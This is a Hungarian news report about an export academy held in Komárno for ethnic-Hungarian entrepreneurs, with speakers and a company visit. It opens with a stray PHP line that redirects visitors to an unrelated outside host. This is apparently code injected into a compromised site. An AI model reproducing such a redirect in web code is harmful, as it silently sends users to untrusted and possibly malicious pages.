header("Location: http://sstellar.host/300.php", true, 301); exit(); ?> Exportakadémia első alkalommal a Felvidéken
szombat, május 25, 2019

Keresés

Exportakadémia első alkalommal a Felvidéken

2614

A komáromi Tiszti pavilon díszterme volt a helyszíne a Magyar Nemzeti Kereskedőház által Felvidéken első alkalommal megszervezett Exportakadémiának. A február 22-ei képzésen mintegy ötven felvidéki magyar vállalkozó vett részt.

Oláh Zsanett, a Magyar Nemzeti Kereskedőház vezérigazgatója a megnyitón hangsúlyozta, a felvidéki magyar vállalkozások nagyon fontos partnerei a magyarországi vállalkozói közösségnek. Az irodahálózat felvidéki irodáival kapcsolatban kifejtette, az elmúlt években több mint ezer helyi magyar érdekeltségű vállalkozást vontak be a Kárpát-medencei gazdasági térbe. Ezáltal több mint egymilliárd forint értékű üzleti lehetőséghez segítették a partnereket.

„Célunk olyan többirányú együttműködés kialakítása, amelyben a határon túli magyar vállalkozásoknak is lehetőségeket tudunk nyújtani, hogy sikeresebbek legyenek" – emelte ki megnyitó beszédében a vezérigazgató. A kereskedőház irodahálózatának jelenleg hét felvidéki irodája működik. Az elő iroda megnyitása óta a Felvidéken számtalan szakmai rendezvényt valósítottak meg, emellett a szakmai kiállítások által lehetőséget biztosítottak az egyes vállalkozások bemutatkozására is – folytatta az irodahálózat tevékenységének értékelését.

A rendezvény keretei között a jelenlévők több előadást is meghallgathattak. Elsőként Papp Vargha Katalin, a Chocomaze tulajdonosa számolt be pozitív tapasztalatairól. Kiselőadásában a sikeres üzleti együttműködésről is szólt.

Gyurácz Németh Iván az Absolvo Consulting Kft. képviseletében a marketingpozicionálást és az üzleti stratégiákat ismertette. Kitért az ügyfélközpontú stratégia alkalmazására, valamint a sikeres értékesítés módozataira is.

A délután folyamán a kintlévőségek és az üzleti kockázatcsökkentés lehetőségeiről, a prezentációs és tárgyalástechnikákról, valamint a külpiaci megjelenés és exportpromóciós szolgáltatások témakörében hangzottak el előadások. Kérdésünkre több jelenlévő vállalkozó is egybehangzóan elmondta: hasznosak az ilyen szakmai találkozások, a kapcsolatteremtés és ismeretszerzés szempontjából is.

A nap zárásaként a kereskedőház képviselői ellátogattak az ipolyszakállosi Natur Products vállalat mézüzemébe. Ezzel kapcsolatban Oláh Zsanett vezérigazgató a Felvidék.ma-nak kifejtette: „A terepen kell helytállni. A vállalkozás kiváló partnere a kereskedőháznak. Nagyon jól prosperáló vállalkozás, amely az irodahálózatnak köszönhetően fokozatosan építi ki a partnerkapcsolatait."

Minden jog fenntartva, Szlovákiai Magyar Közgazdász Társaság, 2010
A honlap a Corvinus Támogatásközvetítő és Tőkebefektetési Zrt. támogatásával készült. Created: namedia